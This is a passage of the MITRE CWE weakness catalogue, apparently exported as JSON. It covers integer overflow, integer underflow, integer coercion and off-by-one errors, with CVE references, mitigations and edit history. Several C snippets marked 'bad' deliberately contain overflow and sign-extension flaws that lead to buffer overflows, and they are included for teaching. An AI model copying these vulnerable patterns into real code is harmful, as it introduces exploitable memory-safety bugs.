bytesRec = 0;char buf[SOMEBIGNUM];while(bytesRec &lt; MAXGET) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"bytesRec += getFromInput(buf+bytesRec);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"In the above case, it is entirely possible that bytesRec may overflow, continuously creating a lower number than MAXGET and also overwriting the first MAXGET-1 bytes of buf."},{"Intro_Text":"In this example the method determineFirstQuarterRevenue is used to determine the first quarter revenue for an accounting/business application. The method retrieves the monthly sales totals for the first three months of the year, calculates the first quarter sales totals from the monthly sales totals, calculates the first quarter revenue based on the first quarter sales, and finally saves the first quarter revenue results to the database.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define JAN 1#define FEB 2#define MAR 3short getMonthlySales(int month) {...}float calculateRevenueForQuarter(short quarterSold) {...}int determineFirstQuarterRevenue() {}","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"float quarterRevenue = 0.0f;short JanSold = getMonthlySales(JAN); /* Get sales in January */short FebSold = getMonthlySales(FEB); /* Get sales in February */short MarSold = getMonthlySales(MAR); /* Get sales in March */short quarterSold = JanSold + FebSold + MarSold;quarterRevenue = calculateRevenueForQuarter(quarterSold);saveFirstQuarterRevenue(quarterRevenue);return 0;","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// Variable for sales revenue for the quarter","// Calculate quarterly total","// Calculate the total revenue for the quarter"]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...float calculateRevenueForQuarter(long quarterSold) {...}int determineFirstQuarterRevenue() {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...long quarterSold = JanSold + FebSold + MarSold;quarterRevenue = calculateRevenueForQuarter(quarterSold);...","xhtml:br":["","","","","","",""],"xhtml:i":["// Calculate quarterly total","// Calculate the total revenue for the quarter"]}}}}],"Body_Text":["However, in this example the primitive type short int is used for both the monthly and the quarterly sales variables. In C the short int primitive type has a maximum value of 32768. This creates a potential integer overflow if the value for the three monthly sales adds up to more than the maximum value for the short int primitive type. An integer overflow can lead to data corruption, unexpected behavior, infinite loops and system crashes. To correct the situation the appropriate primitive type should be used, as in the example below, and/or provide some validation mechanism to ensure that the maximum value for the primitive type is not exceeded.","Note that an integer overflow could also occur if the quarterSold variable has a primitive type long but the method calculateRevenueForQuarter has a parameter of type short."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-10887","Description":"Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887"},{"Reference":"CVE-2019-1010006","Description":"Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006"},{"Reference":"CVE-2010-2753","Description":"Chain: integer overflow leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2753"},{"Reference":"CVE-2005-1513","Description":"Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1513"},{"Reference":"CVE-2002-0391","Description":"Integer overflow via a large number of arguments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0391"},{"Reference":"CVE-2002-0639","Description":"Integer overflow in OpenSSH as listed in the demonstrative examples.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0639"},{"Reference":"CVE-2005-1141","Description":"Image with large width and height leads to integer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1141"},{"Reference":"CVE-2005-0102","Description":"Length value of -1 leads to allocation of 0 bytes and resultant heap overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0102"},{"Reference":"CVE-2004-2013","Description":"Length value of -1 leads to allocation of 0 bytes and resultant heap overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2013"},{"Reference":"CVE-2017-1000121","Description":"chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121"},{"Reference":"CVE-2013-1591","Description":"Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591"}]},"Functional_Areas":{"Functional_Area":["Number Processing","Memory Management","Counters"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Integer overflow (wrap or wraparound)"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Integer Overflow"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Integer overflow"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT18-C","Entry_Name":"Evaluate integer expressions in a larger size before comparing or assigning to that size","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT35-C","Entry_Name":"Evaluate integer expressions in a larger size before comparing or assigning to that size"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM07-C","Entry_Name":"Ensure that the arguments to calloc(), when multiplied, do not wrap","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":3,"Entry_Name":"Integer Overflows"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-145"}},{"attr":{"@_External_Reference_ID":"REF-146"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 20, &#34;Integer Overflows&#34; Page 620"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 7: Integer Overflows.&#34; Page 119"}},{"attr":{"@_External_Reference_ID":"REF-106"}},{"attr":{"@_External_Reference_ID":"REF-150"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Signed Integer Boundaries&#34;, Page 220"}}]},"Notes":{"Note":[{"#text":"Integer overflows can be primary to buffer overflows.","attr":{"@_Type":"Relationship"}},{"#text":"\\"Integer overflow\\" is sometimes used to cover several types of errors, including signedness errors, or buffer overflows that involve manipulation of integer data types instead of characters. Part of the confusion results from the fact that 0xffffffff is -1 in a signed context. Other confusion also arises because of the role that integer overflows have in chains.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Common_Consequences, Description, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Functional_Areas, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Functional_Areas, Observed_Examples, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Integer Overflow (Wrap or Wraparound)","attr":{"@_Date":"2009-01-12"}}}},"191":{"attr":{"@_ID":"191","@_Name":"Integer Underflow (Wrap or Wraparound)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result.","Extended_Description":"This can happen in signed and unsigned cases.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Integer underflow","Description":{"xhtml:p":["\\"Integer underflow\\" is sometimes used to identify signedness errors in which an originally positive number becomes negative as a result of subtraction. However, there are cases of bad subtraction in which unsigned integers are involved, so it\'s not always a signedness issue.","\\"Integer underflow\\" is occasionally used to describe array index errors in which the index is negative."]}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example subtracts from a 32 bit signed integer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;stdbool.h&gt;main (void){}","xhtml:br":["","","",""],"xhtml:div":{"#text":"int i;i = -2147483648;i = i - 1;return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"The example has an integer underflow. The value of i is already at the lowest negative value possible, so after subtracting 1, the new value of i is 2147483647."},{"attr":{"@_Demonstrative_Example_ID":"DX-137"},"Intro_Text":"This code performs a stack allocation based on a length calculation.","Example_Code":{"#text":"}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int a = 5, b = 6;size_t len = a - b;char buf[len];    // Just blows up the stack","xhtml:br":["",""]}},"Body_Text":["Since a and b are declared as signed ints, the \\"a - b\\" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer\'s memory space.","Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker\'s input to attain the negative value."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0816","Description":"Integer underflow in firewall via malformed packet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0816"},{"Reference":"CVE-2004-1002","Description":"Integer underflow by packet with invalid length.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1002"},{"Reference":"CVE-2005-0199","Description":"Long input causes incorrect length calculation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0199"},{"Reference":"CVE-2005-1891","Description":"Malformed icon causes integer underflow in loop counter variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1891"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Integer underflow (wrap or wraparound)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow","Mapping_Fit":"Imprecise"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 7: Integer Overflows.&#34; Page 119"}}},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"192":{"attr":{"@_ID":"192","@_Name":"Integer Coercion Error","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Integer coercion refers to a set of flaws pertaining to the type casting, extension, or truncation of primitive data types.","Extended_Description":"Several flaws fall under the category of integer coercion errors. For the most part, these errors in and of themselves result only in availability and data integrity issues. However, in some circumstances, they may result in other, more complicated security related flaws, such as buffer overflow conditions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Crash, Exit, or Restart"],"Note":"Integer coercion often leads to undefined states of execution resulting in infinite loops or crashes."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"In some cases, integer coercion errors can lead to exploitable buffer overflow conditions, resulting in the execution of arbitrary code."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Integer coercion errors result in an incorrect value being stored for the variable in question."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"A language which throws exceptions on ambiguous data casts might be chosen."},{"Phase":"Architecture and Design","Description":"Design objects and program flow such that multiple or complex casts are unnecessary"},{"Phase":"Implementation","Description":"Ensure that any data type casting that you must used is entirely understood in order to reduce the plausibility of error in use."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet-&gt;headers;if (numHeaders &gt; 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-23"},"Intro_Text":"The following code reads a maximum size and performs validation on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of \\"short s\\" is forced in this particular example, short int\'s are frequently used within real-world code, such as code that processes structured data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int GetUntrustedInt () {}void main (int argc, char **argv) {}","xhtml:div":[{"#text":"return(0x0000FFFF);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char path[256];char *input;int i;short s;unsigned int sz;i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s &gt; 256) {}/* s is sign-extended and saved in sz */sz = s;/* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf(\\"i=%d, s=%d, sz=%u\\\\n\\", i, s, sz);input = GetUserInput(\\"Enter pathname:\\");/* strncpy interprets s as unsigned int, so it\'s treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = \'\\\\0\'; /* don\'t want CWE-170 */printf(\\"Path is: %s\\\\n\\", path);","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"DiePainfully(\\"go away!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":["",""]}},"Body_Text":"This code first exhibits an example of CWE-839, allowing \\"s\\" to be a negative number. When the negative short \\"s\\" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119)."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Integer coercion error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT02-C","Entry_Name":"Understand integer conversion rules"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT05-C","Entry_Name":"Do not use input functions to convert character data if they cannot handle all possible inputs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"Exact"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 7: Integer Overflows.&#34; Page 119"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Sign Extension&#34;, Page 248"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Within C, it might be that \\"coercion\\" is semantically different than \\"casting\\", possibly depending on whether the programmer directly specifies the conversion, or if the compiler does it implicitly. This has implications for the presentation of this entry and others, such as CWE-681, and whether there is enough of a difference for these entries to be split.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, References"}]}},"193":{"attr":{"@_ID":"193","@_Name":"Off-by-one Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product calculates or uses an incorrect maximum or minimum value that is 1 more, or 1 less, than the correct value.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"617","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"170","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"off-by-five","Description":"An \\"off-by-five\\" error was reported for sudo in 2002 (CVE-2002-0184), but that is more like a \\"length calculation\\" error."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When copying character arrays or using character manipulation methods, the correct size parameter must be used to account for the null terminator that needs to be added at the end of the array. Some examples of functions susceptible to this weakness in C include strcpy(), strncpy(), strcat(), strncat(), printf(), sprintf(), scanf() and sscanf()."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-20"},"Intro_Text":"The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int i;unsigned int numWidgets;Widget **WidgetList;numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets &gt; MAX_NUM_WIDGETS)) {}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf(\\"WidgetList ptr=%p\\\\n\\", WidgetList);for(i=0; i&lt;numWidgets; i++) {}WidgetList[numWidgets] = 